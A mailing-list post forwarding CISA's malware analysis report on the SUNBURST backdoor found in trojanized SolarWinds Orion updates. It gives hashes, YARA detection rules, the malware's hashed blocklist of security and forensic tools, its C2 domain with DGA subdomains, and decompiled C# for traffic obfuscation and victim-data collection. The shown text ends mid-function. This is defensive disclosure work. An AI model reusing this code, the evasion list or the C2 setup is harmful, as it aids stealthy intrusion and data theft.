413.587.4600 Toll-free - 877-7ITABIX (877.748.2249) -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: dhhlebgbpmjlkjnl.png Type: image/png Size: 15646 bytes Desc: dhhlebgbpmjlkjnl.png URL: From rich at tnrglobal.com Mon Feb 8 17:59:32 2021 From: rich at tnrglobal.com (Rich@tnr) Date: Mon, 8 Feb 2021 12:59:32 -0500 Subject: [Hidden-tech] Fwd: MK: AR21-039A: MAR-10318845-1.v1 - SUNBURST In-Reply-To: <16954503.52401@ncas.us-cert.gov> References: <16954503.52401@ncas.us-cert.gov> Message-ID: <91123ec4-ce26-f8b5-6b5e-6b2357da18dd@tnrglobal.com> For those interested - I am sending this (you can subscribe yourself, I don't generally forward posts from US-CERT They come out a few times a week -------- Forwarded Message -------- Subject: MK: AR21-039A: MAR-10318845-1.v1 - SUNBURST Date: Mon, 08 Feb 2021 17:10:02 +0000 From: US-CERT Reply-To: US-CERT at ncas.us-cert.gov To: michaelk at tnrglobal.com AR21-039A: MAR-10318845-1.v1 - SUNBURST Cybersecurity and Infrastructure Security Agency (CISA) - Defend Today, Secure Tomorrow You are subscribed to National Cyber Awareness System Analysis Reports for Cybersecurity and Infrastructure Security Agency. This information has recently been updated, and is now available. AR21-039A: MAR-10318845-1.v1 - SUNBURST 02/08/2021 11:00 AM EST Original release date: February 8, 2021 Description Malware Analysis Report 10318845.r1.v1 2021-02-05 Notification This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise. This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp. Summary Description This report provides detailed analysis of several malicious artifacts associated with a sophisticated supply chain compromise of SolarWinds Orion network management software, identified by the security company FireEye as SUNBURST. After being delivered as part of certain SolarWinds updates, a trojanized version of the ?solarwinds.orion.core.businesslayer.dll? containing SUNBURST malware is installed by a legitimate SolarWinds installer application. The modified dynamic-link library (DLL) contains an obfuscated backdoor that allows a remote operator to execute various functions on the compromised system, as well as deploy additional payloads and exfiltrate data. The embedded SUNBURST code encrypts its outbound communications to the remote operator using XOR encryption and modified Base64 encoding. To maintain a low profile, the SUNBURST code will not run if it detects certain security software running on the target system. For a downloadable copy of IOCs, see: MAR-10318845-1.v1.stix . Submitted Files (4) 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 (SolarWinds.Orion.Core.Business...) 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 (SolarWinds.Orion.Core.Business...) ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 (SolarWinds.Orion.Core.Business...) d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600 (SolarWinds-Core-v2019.4.5220-H...) Domains (1) avsvmcloud.com Findings 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 Tags backdoorremote-access-trojantrojan Details Name SolarWinds.Orion.Core.BusinessLayer.dll Size 1011032 bytes Type PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows MD5 b91ce2fa41029f6955bff20079468448 SHA1 76640508b1e7759e548771a5359eaed353bf1eec SHA256 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 SHA512 6a81f082f36ccbda48070772c5a97e1d7de61ad77465e7befe8cbd97df40dcc5da09c461311708e3d57527e323484b05cfd3e72a3c70e106e47f44cc77584bd7 ssdeep 12288:Zx7m/z9aEBzvnvLtYAi6uLlYQ69BBpIvF1tjpH7BKi+0A8vca9owQ:6aEBTvRBi6uL6dIvDtjpH9+0A8vca9oD Entropy 5.582827 Antivirus Ahnlab Backdoor/Win32.SunBurst Antiy Trojan[Backdoor]/MSIL.Agent Avira TR/Sunburst.AO BitDefender Trojan.Sunburst.A Clamav Win.Countermeasure.Sunburst-9809152-0 Comodo Backdoor Cyren W32/Trojan.BCCG-2955 ESET a variant of MSIL/SunBurst.A trojan Emsisoft Trojan.Win32.Sunburst (A) Ikarus Backdoor.Sunburst K7 Trojan ( 00574a531 ) Lavasoft Trojan.Sunburst.A McAfee Trojan-sunburst Microsoft Security Essentials Trojan:MSIL/Solorigate.BR!dha NANOAV Trojan.Win32.SunBurst.iduxjk Sophos Mal/Sunburst-A Symantec Backdoor.Sunburst!gen1 Systweak trojan-backdoor.sunburst-r TrendMicro Backdoo.6F8C6A1E TrendMicro House Call Backdoo.6F8C6A1E Vir.IT eXplorer Trojan.Win32.SunBurst.A VirusBlokAda TScope.Trojan.MSIL Zillya! Backdoor.Sunburst.Win32.2 YARA Rules * rule CISA_10318927_01 : trojan rat SOLAR_FIRE { ???meta: ??? ???Author = "CISA Code & Media Analysis" ??? ???Incident = "10318927" ??? ???Date = "2020-12-13" ??? ???Last_Modified = "20201213_2145" ??? ???Actor = "n/a" ??? ???Category = "TROJAN RAT" ??? ???Family = "SOLAR_FIRE" ??? ???Description = "This signature is based off of unique strings embedded within the modified Solar Winds app" ??? ???MD5_1 = "b91ce2fa41029f6955bff20079468448" ??? ???SHA256_1 = "32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77" ??? ???MD5_2 = "846e27a652a5e1bfbd0ddd38a16dc865" ??? ???SHA256_2 = "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6" ???strings: ??? ???$s0 = { 63 00 30 00 6B 00 74 00 54 00 69 00 37 00 4B 00 4C 00 43 00 6A 00 4A 00 7A 00 4D 00 38 00 44 } ??? ???$s1 = { 41 00 41 00 3D 00 3D 00 00 21 38 00 33 00 56 00 30 00 64 00 6B 00 78 00 4A 00 4B 00 55 } ??? ???$s2 = { 63 00 2F 00 46 00 77 00 44 00 6E 00 44 00 4E 00 53 00 30 00 7A 00 4B 00 53 00 55 00 30 00 42 00 41 00 41 00 3D 00 3D } ??? ???$s3 = { 53 00 69 00 30 00 75 00 42 00 67 00 41 00 3D 00 00 21 38 00 77 00 77 00 49 00 4C 00 6B 00 33 00 4B 00 53 00 79 00 30 00 42 } ???condition: all of them } * rule FireEye_20_00025668_01 : SUNBURST APT backdoor { ???meta: ??? ???Author = "FireEye" ??? ???Date = "2020-12-13" ??? ???Last_Modified = "20201213_1917" ??? ???Actor = "n/a" ??? ???Category = "Backdoor" ??? ???Family = "SUNBURST" ??? ???Description = "This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions. The first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver names/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services." ??? ???MD5_1 = "" ??? ???SHA256_1 = "" ???strings: ??? ???$cmd_regex_encoded = "U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA" wide ??? ???$cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D } ??? ???$fake_orion_event_encoded = "U3ItS80rCaksSFWyUvIvyszPU9IBAA==" wide ??? ???$fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C } ??? ???$fake_orion_eventmanager_encoded = "U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==" wide ??? ???$fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67 65 72 22 2C } ??? ???$fake_orion_message_encoded = "U/JNLS5OTE9VslKqNqhVAgA=" wide ??? ???$fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 } ??? ???$fnv_xor = { 67 19 D8 A7 3B 90 AC 5B } ???condition: ??? ???$fnv_xor and ($cmd_regex_encoded or $cmd_regex_plain) or ( ($fake_orion_event_encoded or $fake_orion_event_plain) and ($fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain) and ($fake_orion_message_encoded and $fake_orion_message_plain) ) } * rule FireEye_20_00025668_02 : SUNBURST APT backdoor { ???meta: ??? ???Author = "FireEye" ??? ???Date = "2020-12-13" ??? ???Last_Modified = "20201213_1917" ??? ???Actor = "n/a" ??? ???Category = "Backdoor" ??? ???Family = "SUNBURST" ??? ???Description = "The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2 communications. This rule is looking for each branch of the code that checks for which HTTP method is being used. This is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally designed so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services." ??? ???MD5_1 = "" ??? ???SHA256_1 = "" ???strings: ??? ???$a = "0y3Kzy8BAA==" wide ??? ???$aa = "S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA" wide ??? ???$ab = "S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=" wide ??? ???$ac = "C88sSs1JLS4GAA==" wide ??? ???$ad = "C/UEAA==" wide ??? ???$ae = "C89MSU8tKQYA" wide ??? ???$af = "8wvwBQA=" wide ??? ???$ag = "cyzIz8nJBwA=" wide ??? ???$ah = "c87JL03xzc/LLMkvysxLBwA=" wide ??? ???$ai = "88tPSS0GAA==" wide ??? ???$aj = "C8vPKc1NLQYA" wide ??? ???$ak = "88wrSS1KS0xOLQYA" wide ??? ???$al = "c87PLcjPS80rKQYA" wide ??? ???$am = "Ky7PLNAvLUjRBwA=" wide ??? ???$an = "06vIzQEA" wide ??? ???$b = "0y3NyyxLLSpOzIlPTgQA" wide ??? ???$c = "001OBAA=" wide ??? ???$d = "0y0oysxNLKqMT04EAA==" wide ??? ???$e = "0y3JzE0tLknMLQAA" wide ??? ???$f = "003PyU9KzAEA" wide ??? ???$h = "0y1OTS4tSk1OBAA=" wide ??? ???$i = "K8jO1E8uytGvNqitNqytNqrVA/IA" wide ??? ???$j = "c8rPSQEA" wide ??? ???$k = "c8rPSfEsSczJTAYA" wide ??? ???$l = "c60oKUp0ys9JAQA=" wide ??? ???$m = "c60oKUp0ys9J8SxJzMlMBgA=" wide ??? ???$n = "8yxJzMlMBgA=" wide ??? ???$o = "88lMzygBAA==" wide ??? ???$p = "88lMzyjxLEnMyUwGAA==" wide ??? ???$q = "C0pNL81JLAIA" wide ??? ???$r = "C07NzXTKz0kBAA==" wide ??? ???$s = "C07NzXTKz0nxLEnMyUwGAA==" wide ??? ???$t = "yy9IzStOzCsGAA==" wide ??? ???$u = "y8svyQcA" wide ??? ???$v = "SytKTU3LzysBAA==" wide ??? ???$w = "C84vLUpOdc5PSQ0oygcA" wide ??? ???$x = "C84vLUpODU4tykwLKMoHAA==" wide ??? ???$y = "C84vLUpO9UjMC07MKwYA" wide ??? ???$z = "C84vLUpO9UjMC04tykwDAA==" wide ???condition: ??? ???($a and $b and $c and $d and $e and $f and $h and $i) or ($j and $k and $l and $m and $n and $o and $p and $q and $r and $s and ($aa or $ab)) or ($t and $u and $v and $w and $x and $y and $z and ($aa or $ab)) or ($ac and $ad and $ae and $af and $ag and $ah and ($am or $an)) or ($ai and $aj and $ak and $al and ($am or $an)) } ssdeep Matches No matches found. PE Metadata Compile Date 2020-03-24 04:52:34-04:00 Import Hash dae02f32a21e03ce65412f6e56942daa Company Name SolarWinds Worldwide, LLC. File Description SolarWinds.Orion.Core.BusinessLayer Internal Name SolarWinds.Orion.Core.BusinessLayer.dll Legal Copyright Copyright ? 1999-2020 SolarWinds Worldwide, LLC. All Rights Reserved. Original Filename SolarWinds.Orion.Core.BusinessLayer.dll Product Name SolarWinds.Orion.Core.BusinessLayer Product Version 2019.4.5200.9083 PE Sections MD5 Name Raw Size Entropy 9f1dcf8b4df81fdd1e33e8157fb58d9f header 512 2.890704 ac9dc455a67c7f2c9f10725d66c115d1 .text 1001472 5.569219 69a064c0b6001299af109ed0d06f6c6f .rsrc 1536 3.015713 275a7e1f11b8e5fefa163e47c22129b4 .reloc 512 0.101910 Relationships 32519b85c0... Connected_To avsvmcloud.com 32519b85c0... Contained_Within d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600 Description This file is a 32-bit .NET DLL named "SolarWinds.Orion.Core.BusinessLayer.dll." It is a modified SolarWinds-signed plugin component of the Orion software framework that has been patched with the SUNBURST backdoor. This malicious file was signed with a digital certificate issued by Symantec to SolarWinds. The digital certificate should be considered compromised. --Begin Digital Certificate Information-- Signer: ??? CN="Solarwinds Worldwide, LLC", O="Solarwinds Worldwide, LLC", L=Austin, S=Texas, C=US Issuer: ??? CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=SymantecCorporation, C=US SN: 0FE973752022A606ADF2A36E345DC0ED Not Before: 1/20/2020 7:00:00 PM Not After: 1/20/2023 6:59:59 PM Thumbprint: 47D92D49E6F7F296260DA1AF355F941EB25360C4 Status: ??? Valid StatusMsg: Signature verified. --End Digital Certificate Information-- SUNBURST provides the following capabilities on a compromised system, which are discussed in further detail below. - Sets a 12 to 14 day delayed execution time - Stealth - Command and Control (C2) communication - Collect system information - Upload system information from the victim system - Run specified tasks - Terminate processes - Download, read, write, move, delete, and execute files - Compute file hashes - Reboot the system - Adjust process privileges **DELAYED EXECUTION** SUNBURST is executed by a legitimate SolarWinds software application designed to load and run SolarWinds plugins. Once installed, it compares its last write time to a randomly generated value between 288 and 336 hours (12 - 14 days) after the file was written. The malware will sleep until this calculated time frame has passed, after which, the malware will begin C2 sessions to retrieve and execute commands or "Jobs? on behalf of the adversary. **STEALTH** SUNBURST uses obfuscated blocklists consisting of hashed process and service names to identify analysis tools and antivirus software components running as processes, services, and drivers. It utilizes a modified version of the FNV-1a hash algorithm to determine if specific processes are running on the target system. It will enumerate and hash the process names of all running processes and compare the generated hashes to a hard-coded blocklist. If no block-listed processes are found, it will attempt to resolve the domain "api.solarwinds.com" to test for network connectivity. If a block-listed process is found, it does not proceed with its C2 session. This evasion technique is used to keep it from being detected. The hard coded hashed process names are stored in an unsigned LONG list named "assemblyTimeStamps." See ?**BLOCK LIST CHECKING FUNCTIONS**? below in this report for details. --Begin hard-coded list of block-listed processes and names-- 1475579823244607677 ??? ??? 100-continue 2734787258623754862 ??? ??? accept 1368907909245890092 ??? ??? afwserv 16858955978146406642 ??? ???apac.lab 2597124982561782591 ??? ??? apimonitor-x64 2600364143812063535 ??? ??? apimonitor-x86 6195833633417633900 ??? ??? aswengsrv 2934149816356927366 ??? ??? aswidsagent 13029357933491444455 ??? ???aswidsagenta 15194901817027173566 ??? ???atrsdfw.sys 4821863173800309721 ??? ??? autopsy 13464308873961738403 ??? ???autopsy64 3320026265773918739 ??? ??? autoruns 12969190449276002545 ??? ???autoruns64 10657751674541025650 ??? ???autorunsc 12094027092655598256 ??? ???autorunsc64 2760663353550280147 ??? ??? avastavwrapper 8146185202538899243 ??? ??? avastsvc 11818825521849580123 ??? ???avastui 11109294216876344399 ???avgadminclientservice 2797129108883749491 ??? ??? avgidsagent 3660705254426876796 ??? ??? avgsvc 3890794756780010537 ??? ??? avgsvca 3890769468012566366 ??? ??? avgsvcx 12709986806548166638 ??? ???avgui 14095938998438966337 ??? ???avgwdsvcx 13611051401579634621 ??? ???avp 18147627057830191163 ??? ???avpui 16423314183614230717 ??? ???bccavsvc 11913842725949116895 ??? ???binaryninja 5449730069165757263 ??? ??? blacklight 12679195163651834776 ???brcow_x_x_x_x.sys 1614465773938842903 ??? ??? brfilter.sys 11385275378891906608 ??? ???carbonblack 13693525876560827283 ??? ???carbonblackk 17204844226884380288 ??? ???cavp 5984963105389676759 ??? ??? cb 17849680105131524334 ??? ???cbcomms 18246404330670877335 ??? ???cbstream 292198192373389586 ??? ??? ???cff explorer 14226582801651130532 ??? ???close 11266044540366291518 ??? ???connection 6116246686670134098 ??? ??? content-type 10734127004244879770 ??? ???cork.lab 18159703063075866524 ??? ???crexecprev.sys 11771945869106552231 ??? ???csagent 9234894663364701749 csdevicecontrol 9061219083560670602 csfalconcontainer 8698326794961817906 csfalconservice 12790084614253405985 ??? ???cutter 16570804352575357627 ??? ???cve.sys 17097380490166623672 ???cybkerneltracker.sys 16066522799090129502 ??? ???date 5219431737322569038 ??? ??? de4dot 15535773470978271326 ??? ???debugview 11073283311104541690 ??? ???dev.local 3626142665768487764 ??? ??? dgdmk.sys 7810436520414958497 ??? ??? diskmon 4030236413975199654 ??? ??? dmz.local 13316211011159594063 ??? ???dnsd 13825071784440082496 ??? ???dnspy 14480775929210717493 ??? ???dotpeek32 14482658293117931546 ??? ???dotpeek64 8473756179280619170 ??? ??? dumpcap 15587050164583443069 ??? ???eamonm 12718416789200275332 ??? ???eaw.sys 9559632696372799208 ??? ??? eelam 607197993339007484 ??? ??? ???egui 14513577387099045298 ??? ???eguiproxy 4931721628717906635 ??? ??? ehdrv 14079676299181301772 ??? ???ekbdflt 3200333496547938354 ??? ??? ekrn 2589926981877829912 ??? ??? ekrnepfw 8727477769544302060 ??? ??? emea.sales 17939405613729073960 ??? ???epfw 17997967489723066537 ??? ???epfwwfp 3778500091710709090 ??? ??? evidence center 8799118153397725683 ??? ??? exeinfope 8873858923435176895 ??? ??? expect 13783346438774742614 ??? ???f-secure filter 16112751343173365533 ??? ???f-secure gatekeeper 17624147599670377042 ??? ???f-secure gatekeeper handler starter 3425260965299690882 ??? ??? f-secure hips 16066651430762394116 ??? ???f-secure network request broker 2380224015317016190 ??? ??? f-secure recognizer 13655261125244647696 ??? ???f-secure webui daemon 12027963942392743532 ??? ???fakedns 576626207276463000 ??? ??? ???fakenet 9384605490088500348 ??? ??? fe_avk 15092207615430402812 ??? ???feelam 6274014997237900919 ??? ??? fekern 3320767229281015341 ??? ??? fewscservice 7412338704062093516 ??? ??? ffdec 682250828679635420 ??? ??? ???fiddler 13014156621614176974 ??? ???fileinsight 18150909006539876521 ??? ???floss 5587557070429522647 ??? ??? fnrb32 12445177985737237804 ??? ???fsaua 12445232961318634374 ??? ???fsaus 17017923349298346219 ??? ???fsav32 9333057603143916814 ??? ??? fsbts 541172992193764396 ??? ??? ???fsdevcon 10393903804869831898 ??? ???fsdfw 3413052607651207697 ??? ??? fses 3407972863931386250 ??? ??? fsfw 10545868833523019926 ??? ???fsgk32 521157249538507889 ??? ??? ???fsgk32st 3421213182954201407 ??? ??? fsma 15039834196857999838 ??? ???fsma32 3421197789791424393 ??? ??? fsms 3413886037471417852 ??? ??? fsni 17978774977754553159 ??? ???fsorsp 14243671177281069512 ??? ???fsorspclient 14055243717250701608 ??? ???fssm32 7315838824213522000 ??? ??? fsvista 14971809093655817917 ??? ???fswebuid 10336842116636872171 ??? ???gdb 6943102301517884811 groundling32.sys 13544031715334011032 ???groundling64.sys 397780960855462669 ???hexisfsmonitor.sys 13260224381505715848 ??? ???hiew32 12785322942775634499 ??? ???hiew32demo 17956969551821596225 ??? ???hollows_hunter 14256853800858727521 ??? ???idaq 8709004393777297355 ??? ??? idaq64 8129411991672431889 ??? ??? idr 15514036435533858158 ???if-modified-since 15997665423159927228 ??? ???ildasm 10829648878147112121 ??? ???ilspy 9149947745824492274 ??? ??? jd-gui 13852439084267373191 ??? ???keep-alive 17633734304611248415 ??? ???ksde 13581776705111912829 ??? ???ksdeui 4578480846255629462 ??? ??? lab.brno 8381292265993977266 ??? ??? lab.local 3796405623695665524 ??? ??? lab.na 5942282052525294911 ??? ??? lab.rio 17984632978012874803 ??? ???libwamf.sys 3656637464651387014 ??? ??? lordpe 2717025511528702475 ??? ??? lragentmf.sys 10501212300031893463 ???microsoft.tri.sensor 155978580751494388 ???microsoft.tri.sensor.updater 5183687599225757871 ??? ??? msmpeng 10063651499895178962 ??? ???mssense 3575761800716667678 officemalscanner 4501656691368064027 ??? ??? ollydbg 7701683279824397773 ??? ??? pci.local 10296494671777307979 ???pdfstreamdumper 14630721578341374856 ??? ???pe-bear 6461429591783621719 ??? ??? pe-sieve32 6508141243778577344 ??? ??? pe-sieve64 4088976323439621041 ??? ??? pebrowse64 9531326785919727076 ??? ??? peid 10235971842993272939 ??? ???pestudio 2478231962306073784 ??? ??? peview 9903758755917170407 ??? ??? pexplorer 14710585101020280896 ??? ???ppee 2810460305047003196 ??? ??? procdump 13611814135072561278 ??? ???procdump64 2032008861530788751 ??? ??? processhacker 6491986958834001955 ??? ??? procexp 27407921587843457 ??? ??? ??? procexp64 2128122064571842954 ??? ??? procmon 10484659978517092504 ???prodiscoverbasic 2532538262737333146 ??? ??? psanhost 835151375515278827 ???psepfilter.sys 6088115528707848728 ??? ??? psuamain 4454255944391929578 ??? ??? psuaservice 8478833628889826985 py2exedecompiler 10463926208560207521 ??? ???r2agent 7080175711202577138 ??? ??? rabin2 8697424601205169055 ??? ??? radare2 16130138450758310172 ??? ???ramcapture 7775177810774851294 ??? ??? ramcapture64 700598796416086955 ??? ??? ???redcloak 9007106680104765185 ??? ??? referer 506634811745884560 ??? ??? ???reflector 18294908219222222902 ??? ???regmon 3588624367609827560 ??? ??? resourcehacker 9555688264681862794 retdec-ar-extractor 5415426428750045503 retdec-bin2llvmir 3642525650883269872 ??? ??? retdec-bin2pat 13135068273077306806 ??? ???retdec-config 3769837838875367802 retdec-fileinfo 191060519014405309 ???retdec-getsig 1682585410644922036 ??? ??? retdec-idr2pat 7878537243757499832 retdec-llvmir2hll 13799353263187722717 ???retdec-macho-extractor 1367627386496056834 retdec-pat2yara 12574535824074203265 ???retdec-stacofin 16990567851129491937 ???retdec-unpacker 8994091295115840290 ??? ??? retdec-yarac 13876356431472225791 ??? ???rundotnetdll 18392881921099771407 ??? ???rvsavd.sys 5132256620104998637 ??? ??? saas.swi 11801746708619571308 ??? ???safe-agent.sys 14968320160131875803 ??? ???sbiesvc 14868920869169964081 ??? ???scdbg 106672141413120087 ??? ??? ???scylla_x64 79089792725215063 ??? ??? ??? scylla_x86 16335643316870329598 ??? ???sense 12343334044036541897 ???sentinelmonitor.sys 5614586596107908838 shellcode_launcher 17291806236368054941 ???solarwinds.businesslayerhost 3869935012404164040 solarwindsdiagnostics 15267980678929160412 ??? ???swdev.dmz 1109067043404435916 ??? ??? swdev.local 14111374107076822891 ??? ???sysmon 3538022140597504361 ??? ??? sysmon64 7175363135479931834 ??? ??? tanium 3178468437029279937 ??? ??? taniumclient 13599785766252827703 ???taniumdetectengine 6180361713414290679 taniumendpointindex 8612208440357175863 ??? ??? taniumtracecli 8408095252303317471 taniumtracewebsocketclient64 7982848972385914508 ??? ??? task explorer 8760312338504300643 ??? ??? task explorer-64 17351543633914244545 ??? ???tcpdump 7516148236133302073 ??? ??? tcpvcon 15114163911481793350 ??? ???tcpview 7574774749059321801 ??? ??? user-agent 15457732070353984570 ??? ???vboxservice 16292685861617888592 ??? ???win32_remote 10374841591685794123 ???win64_remotex64 3045986759481489935 ??? ??? windbg 917638920165491138 ??? ??? ???windefend 17109238199226571972 ??? ???windump 5945487981219695001 ??? ??? winhex 6827032273910657891 ??? ??? winhex64 8052533790968282297 ??? ??? winobj 17574002783607647274 ??? ???wireshark 3341747963119755850 ??? ??? x32dbg 14193859431895170587 ??? ???x64dbg 15695338751700748390 ??? ???xagt 640589622539783622 ??? ??? ???xagtnotif 17683972236092287897 ??? ???xwforensics 17439059603042731363 ??? ???xwforensics64 --End hard-coded list of block-listed processes and names-- **COMMAND AND CONTROL** During runtime, SUNBURST hashes its own parent process name, and compares it to the value 17291806236368054941. If it does not match, the malicious class ?OrionImprovementBusinessLayer? will stop executing and the DLL will continue normal activity. When communicating with its C2, SUNBURST utilizes the Orion Improvement Program (OIP) protocol to disguise network activity as normal SolarWinds Orion traffic. The connection with the C2 server will contain a randomly generated ?customer ID" that allows the adversary to track different compromised systems. To establish C2, it will construct and resolve the subdomains of "avsvmcloud.com" using a domain generation algorithm (DGA). The following format is used to generate the domain name: --Begin format of the domain name-- .appsync-api.eu-west-1.avsvmcloud.com .appsync-api.us-west-2.avsvmcloud.com .appsync-api.us-east-1.avsvmcloud.com .appsync-api.us-east-2.avsvmcloud.com --End format of the domain name-- It will attempt to make a Canonical Name (CNAME) query according to different third-level domain names in combination with the DGA to verify the C2 server is accessible before executing its command control session. --Begin domain names combined with DGA-- 6a57jk2ba1d9keg15cbg.appsync-api.eu-west-1.avsvmcloud.com 7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud.com gq1h856599gqh538acqn.appsync-api.us-west-2.avsvmcloud.com ihvpgv9psvq02ffo77et.appsync-api.us-east-2.avsvmcloud.com k5kcubuassl3alrf7gm3.appsync-api.eu-west-1.avsvmcloud.com mhdosoksaccf9sni9icp.appsync-api.eu-west-1.avsvmcloud.com --End domain names plus DGA-- Outbound communications are encrypted using an embedded class named ?CryptoHelper.? The class contains two functions named ?CreateSecureString? and ?Base64Encode.? The function ?CreateSecureString? creates a random byte and then utilizes this random byte to encode the string provided. The randomly generated byte, used as the XOR key, will be stored at offset 0x00 of the encoded string -- allowing the adversary to decrypt the traffic received from this implant. The function ?CreateSecureString? takes two arguments, a byte array which will be the data targeted for encryption and a bool variable. If this variable is set to "true" the function will ?OR? the generated ?XOR? key byte with the value 128 before using it to XOR encode the provided data. It then calls the Base64Encode function to further obfuscate the communication. --Begin CreateSecureString Function-- private static string CreateSecureString(byte[] data, bool flag) ??? ???{ ??? ??? ???byte[] bytes = new byte[data.Length + 1]; ??? ??? ???bytes[0] = (byte)new Random().Next(1, (int)sbyte.MaxValue); ??? ??? ???if (flag) ??? ??? ??? ???bytes[0] |= (byte)128; ??? ??? ???for (int index = 1; index < bytes.Length; ++index) ??? ??? ??? ???bytes[index] = (byte)((uint)data[index - 1] ^ (uint)bytes[0]); ??? ??? ???return Base64Encode(bytes, true); ??? ???} --End CreateSecureString Function-- The Base64Encode function is a modified version of the Base64 algorithm that uses the custom alphabet, "ph2eifo3n5utg1j8d94qrvbmk0sal76c.? This custom Base64 encoding makes it harder to interpret network traffic sent between this malicious implant and the remote C2 server. The custom Base64 alphabet and algorithm utilized would be required to decode the network traffic. --Begin Base64Encode Function-- private static string Base64Encode(byte[] bytes, bool rt) ??? { ??? ???string str1 = OrionImprovementBusinessLayer.ZipHelper.Unzip("K8gwSs1MyzfOMy0tSTfMskixNCksKkvKzTYoTswxN0sGAA=="); ??? ???string str2 = ""; ??? ???uint num1 = 0; ??? ???int num2 = 0; ??? ???foreach (byte num3 in bytes) ??? ???{ ??? ??? num1 |= (uint) num3 << num2; ??? ??? for (num2 += 8; num2 >= 5; num2 -= 5) ??? ??? { ??? ??? ???str2 += str1[(int) num1 & 31].ToString(); ??? ??? ???num1 >>= 5; ??? ??? } ??? ???} ??? ???if (num2 > 0) ??? ???{ ??? ??? if (rt) ??? ??? ???num1 |= (uint) (new Random().Next() << num2); ??? ??? str2 += str1[(int) num1 & 31].ToString(); ??? ???} ??? ???return str2; ??? } --End Base64Encode Function-- **COLLECT SYSTEM INFORMATION** The collection of system description info is carried out by the CollectSystemDescription function. It will collect the following information: Victim domain SID Domain name Hostname Username Operating System (OS) version System directory Environment tick count - the time since the system was last rebooted. public static void CollectSystemDescription(string info, out string result) { result = (string) null; int i = 0; string domainName = IPGlobalProperties.GetIPGlobalProperties().DomainName; result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + domainName; try { string str = ((SecurityIdentifier) new NTAccount(domainName, OrionImprovementBusinessLayer.ZipHelper.Unzip(Administrator)).Translate(typeof (SecurityIdentifier))).AccountDomainSid.ToString(); result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + str; } catch { result += OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i); } result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + IPGlobalProperties.GetIPGlobalProperties().HostName; result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + Environment.UserName; result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + OrionImprovementBusinessLayer.GetOSVersion(true); result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + Environment.SystemDirectory; result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + (object) (int) TimeSpan.FromMilliseconds((double) (uint) Environment.TickCount).TotalDays; result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + info + "\n"; result += OrionImprovementBusinessLayer.GetNetworkAdapterConfiguration(); } The GetNetworkAdapterConfiguration function will gather information on any attached network adapters and their configuration information. private static string GetNetworkAdapterConfiguration() { string str = ""; try { using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(OrionImprovementBusinessLayer.ZipHelper.Unzip(Select * From Win32_NetworkAdapterConfiguration where IPEnabled=true))) { foreach (ManagementObject managementObject in managementObjectSearcher.Get().Cast()) { str += "\n"; str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(Description)); str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(MACAddress)); str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(DHCPEnabled)); str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(DHCPServer)); str += 